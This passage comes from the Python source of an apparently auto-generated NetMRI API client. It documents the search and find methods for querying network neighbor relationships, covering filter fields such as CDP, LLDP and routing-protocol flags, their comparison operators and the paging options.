    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship.
    :type InterfaceID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship.
    :type InterfaceID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param LLDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's LLDP entries.
    :type LLDPInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param LLDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's LLDP entries.
    :type LLDPInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param LLDPNeighborID: The internal NetMRI identifier for this LLDP table entry.
    :type LLDPNeighborID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param LLDPNeighborID: The internal NetMRI identifier for this LLDP table entry.
    :type LLDPNeighborID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param LocalRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a local route.
    :type LocalRoutedInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param LocalRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a local route.
    :type LocalRoutedInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborChangedCols: The fields that changed between this revision of the record and the previous revision.
    :type NeighborChangedCols: String
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborChangedCols: The fields that changed between this revision of the record and the previous revision.
    :type NeighborChangedCols: Array of String
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship.
    :type NeighborDeviceID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship.
    :type NeighborDeviceID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborEndTime: The ending effective time of this revision of this record, or empty if still in effect.
    :type NeighborEndTime: DateTime
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborEndTime: The ending effective time of this revision of this record, or empty if still in effect.
    :type NeighborEndTime: Array of DateTime
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborFirstSeenTime: The date and time this neighbor was first seen on the network, and since which it has been continuously present.
    :type NeighborFirstSeenTime: DateTime
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborFirstSeenTime: The date and time this neighbor was first seen on the network, and since which it has been continuously present.
    :type NeighborFirstSeenTime: Array of DateTime
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborID: The internal NetMRI identifier for this neighbor relationship.
    :type NeighborID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborID: The internal NetMRI identifier for this neighbor relationship.
    :type NeighborID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborIfIndex: The SNMP interface index of the destination device interface.
    :type NeighborIfIndex: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborIfIndex: The SNMP interface index of the destination device interface.
    :type NeighborIfIndex: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship.
    :type NeighborInterfaceID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship.
    :type NeighborInterfaceID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborNetworkDeviceInd: A flag indicating if the destination device is a network device or an end host.
    :type NeighborNetworkDeviceInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborNetworkDeviceInd: A flag indicating if the destination device is a network device or an end host.
    :type NeighborNetworkDeviceInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborStartTime: The starting effective time of this revision of the record.
    :type NeighborStartTime: DateTime
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborStartTime: The starting effective time of this revision of the record.
    :type NeighborStartTime: Array of DateTime
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NeighborTimestamp: The date and time this record was collected or calculated.
    :type NeighborTimestamp: DateTime
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NeighborTimestamp: The date and time this record was collected or calculated.
    :type NeighborTimestamp: Array of DateTime
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param NetworkDeviceInd: A flag indicating if the source device is a network device or an end host.
    :type NetworkDeviceInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param NetworkDeviceInd: A flag indicating if the source device is a network device or an end host.
    :type NetworkDeviceInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param OSPFRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an OSPF route.
    :type OSPFRoutedInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param OSPFRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an OSPF route.
    :type OSPFRoutedInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param ProtoRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a dynamic protocol defined route.
    :type ProtoRoutedInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param ProtoRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a dynamic protocol defined route.
    :type ProtoRoutedInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param RevSwitchFwdInd: A flag indicating that this neighbor relationship was derived by reversing a switch forwarding neighbor relationship.
    :type RevSwitchFwdInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param RevSwitchFwdInd: A flag indicating that this neighbor relationship was derived by reversing a switch forwarding neighbor relationship.
    :type RevSwitchFwdInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param SerialInd: A flag indicating that this neighbor relationship was derived using the NetMRI point-to-point neighbor detection algorithm. Despite the name this may include point-to-point relationships on interfaces other than serial interfaces.
    :type SerialInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param SerialInd: A flag indicating that this neighbor relationship was derived using the NetMRI point-to-point neighbor detection algorithm. Despite the name this may include point-to-point relationships on interfaces other than serial interfaces.
    :type SerialInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param StaticRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a static route.
    :type StaticRoutedInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param StaticRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a static route.
    :type StaticRoutedInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param SwitchFwdInd: A flag indicating that this neighbor relationship was derived using the NetMRI switch forwarding neighbor detection algorithm.
    :type SwitchFwdInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param SwitchFwdInd: A flag indicating that this neighbor relationship was derived using the NetMRI switch forwarding neighbor detection algorithm.
    :type SwitchFwdInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param ifIndex: The SNMP interface index of the source device interface.
    :type ifIndex: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param ifIndex: The SNMP interface index of the source device interface.
    :type ifIndex: Array of Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
    :type DeviceGroupID: Array of Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param timestamp: The data returned will represent the neighbors as of this date and time. If omitted, the result will indicate the most recently collected data.
    :type timestamp: DateTime
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param methods: A list of neighbor methods. The listed methods will be called on each neighbor returned and included in the output. Available methods are: network_id, device, interface, neighbor_device, neighbor_interface, infradevice.
    :type methods: Array of String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device, interface, neighbor_device, neighbor_interface.
    :type include: Array of String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 0
    :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
    :type start: Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 1000
    :param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
    :type limit: Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` NeighborID
    :param sort: The data field(s) to use for sorting the output. Default is NeighborID. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID.
    :type sort: Array of String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` asc
    :param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
    :type dir: Array of String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param select: The list of attributes to return for each Neighbor. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID. If empty or omitted, all attributes will be returned.
    :type select: Array
    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
    :type goto_field: String
    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
    :type goto_value: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param query: This value will be matched against neighbors, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: BGPRoutedInd, CDPInd, CDPNeighborID, CombinedInd, DataSourceID, DeviceID, DirectEthernetInd, IGRPRoutedInd, IPRoutedInd, InterfaceID, LLDPInd, LLDPNeighborID, LocalRoutedInd, NeighborChangedCols, NeighborDeviceID, NeighborEndTime, NeighborFirstSeenTime, NeighborID, NeighborIfIndex, NeighborInterfaceID, NeighborNetworkDeviceInd, NeighborStartTime, NeighborTimestamp, NetworkDeviceInd, OSPFRoutedInd, ProtoRoutedInd, RevSwitchFwdInd, SerialInd, StaticRoutedInd, SwitchFwdInd, ifIndex.
    :type query: String
    | ``api version min:`` 2.3
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not associated with a database filtering.
    :type xml_filter: String
    **Outputs**
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :return neighbors: An array of the Neighbor objects that match the specified input criteria.
    :rtype neighbors: Array of Neighbor
    """
    # Thin delegation: all filter criteria arrive as keyword arguments and are
    # forwarded unchanged to the shared list-request helper. "search" is first
    # resolved (via _get_method_fullname) to this broker's fully-qualified
    # remote API method name — presumably something like "neighbors/search";
    # confirm against the base broker implementation.
    return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available neighbors matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: BGPRoutedInd, CDPInd, CDPNeighborID, CombinedInd, DataSourceID, DeviceID, DirectEthernetInd, IGRPRoutedInd, IPRoutedInd, InterfaceID, LLDPInd, LLDPNeighborID, LocalRoutedInd, NeighborChangedCols, NeighborDeviceID, NeighborEndTime, NeighborFirstSeenTime, NeighborID, NeighborIfIndex, NeighborInterfaceID, NeighborNetworkDeviceInd, NeighborStartTime, NeighborTimestamp, NetworkDeviceInd, OSPFRoutedInd, ProtoRoutedInd, RevSwitchFwdInd, SerialInd, StaticRoutedInd, SwitchFwdInd, ifIndex.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BGPRoutedInd: The operator to apply to the field BGPRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a BGP route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPRoutedInd: If op_BGPRoutedInd is specified, the field named in this input will be compared to the value in BGPRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPRoutedInd must be specified if op_BGPRoutedInd is specified.
:type val_f_BGPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPRoutedInd: If op_BGPRoutedInd is specified, this value will be compared to the value in BGPRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPRoutedInd must be specified if op_BGPRoutedInd is specified.
:type val_c_BGPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CDPInd: The operator to apply to the field CDPInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's CDP entries. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CDPInd: If op_CDPInd is specified, the field named in this input will be compared to the value in CDPInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CDPInd must be specified if op_CDPInd is specified.
:type val_f_CDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CDPInd: If op_CDPInd is specified, this value will be compared to the value in CDPInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CDPInd must be specified if op_CDPInd is specified.
:type val_c_CDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CDPNeighborID: The operator to apply to the field CDPNeighborID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CDPNeighborID: The internal NetMRI identifier for the CdpNeighbor object associated with this neighbor entry (if any). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CDPNeighborID: If op_CDPNeighborID is specified, the field named in this input will be compared to the value in CDPNeighborID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CDPNeighborID must be specified if op_CDPNeighborID is specified.
:type val_f_CDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CDPNeighborID: If op_CDPNeighborID is specified, this value will be compared to the value in CDPNeighborID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CDPNeighborID must be specified if op_CDPNeighborID is specified.
:type val_c_CDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CombinedInd: The operator to apply to the field CombinedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CombinedInd: A flag indicating that these devices have basic layer 1/2 connectivity. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CombinedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CombinedInd: If op_CombinedInd is specified, the field named in this input will be compared to the value in CombinedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CombinedInd must be specified if op_CombinedInd is specified.
:type val_f_CombinedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CombinedInd: If op_CombinedInd is specified, this value will be compared to the value in CombinedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CombinedInd must be specified if op_CombinedInd is specified.
:type val_c_CombinedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DirectEthernetInd: The operator to apply to the field DirectEthernetInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DirectEthernetInd: A flag indicating that this neighbor relationship was derived using the NetMRI direct Ethernet neighbor detection algorithm (for example, two routers directly connected via Ethernet, without any switches between them). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DirectEthernetInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DirectEthernetInd: If op_DirectEthernetInd is specified, the field named in this input will be compared to the value in DirectEthernetInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DirectEthernetInd must be specified if op_DirectEthernetInd is specified.
:type val_f_DirectEthernetInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DirectEthernetInd: If op_DirectEthernetInd is specified, this value will be compared to the value in DirectEthernetInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DirectEthernetInd must be specified if op_DirectEthernetInd is specified.
:type val_c_DirectEthernetInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IGRPRoutedInd: The operator to apply to the field IGRPRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IGRPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an IGRP or EIGRP route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IGRPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IGRPRoutedInd: If op_IGRPRoutedInd is specified, the field named in this input will be compared to the value in IGRPRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IGRPRoutedInd must be specified if op_IGRPRoutedInd is specified.
:type val_f_IGRPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IGRPRoutedInd: If op_IGRPRoutedInd is specified, this value will be compared to the value in IGRPRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IGRPRoutedInd must be specified if op_IGRPRoutedInd is specified.
:type val_c_IGRPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPRoutedInd: The operator to apply to the field IPRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship; that is, the destination device is a next hop for at least one route on the source device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPRoutedInd: If op_IPRoutedInd is specified, the field named in this input will be compared to the value in IPRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPRoutedInd must be specified if op_IPRoutedInd is specified.
:type val_f_IPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPRoutedInd: If op_IPRoutedInd is specified, this value will be compared to the value in IPRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPRoutedInd must be specified if op_IPRoutedInd is specified.
:type val_c_IPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_LLDPInd: The operator to apply to the field LLDPInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. LLDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's LLDP entries. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_LLDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_LLDPInd: If op_LLDPInd is specified, the field named in this input will be compared to the value in LLDPInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_LLDPInd must be specified if op_LLDPInd is specified.
:type val_f_LLDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_LLDPInd: If op_LLDPInd is specified, this value will be compared to the value in LLDPInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_LLDPInd must be specified if op_LLDPInd is specified.
:type val_c_LLDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_LLDPNeighborID: The operator to apply to the field LLDPNeighborID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. LLDPNeighborID: The internal NetMRI identifier for this LLDP table entry. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_LLDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_LLDPNeighborID: If op_LLDPNeighborID is specified, the field named in this input will be compared to the value in LLDPNeighborID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_LLDPNeighborID must be specified if op_LLDPNeighborID is specified.
:type val_f_LLDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_LLDPNeighborID: If op_LLDPNeighborID is specified, this value will be compared to the value in LLDPNeighborID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_LLDPNeighborID must be specified if op_LLDPNeighborID is specified.
:type val_c_LLDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_LocalRoutedInd: The operator to apply to the field LocalRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. LocalRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a local route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_LocalRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_LocalRoutedInd: If op_LocalRoutedInd is specified, the field named in this input will be compared to the value in LocalRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_LocalRoutedInd must be specified if op_LocalRoutedInd is specified.
:type val_f_LocalRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_LocalRoutedInd: If op_LocalRoutedInd is specified, this value will be compared to the value in LocalRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_LocalRoutedInd must be specified if op_LocalRoutedInd is specified.
:type val_c_LocalRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
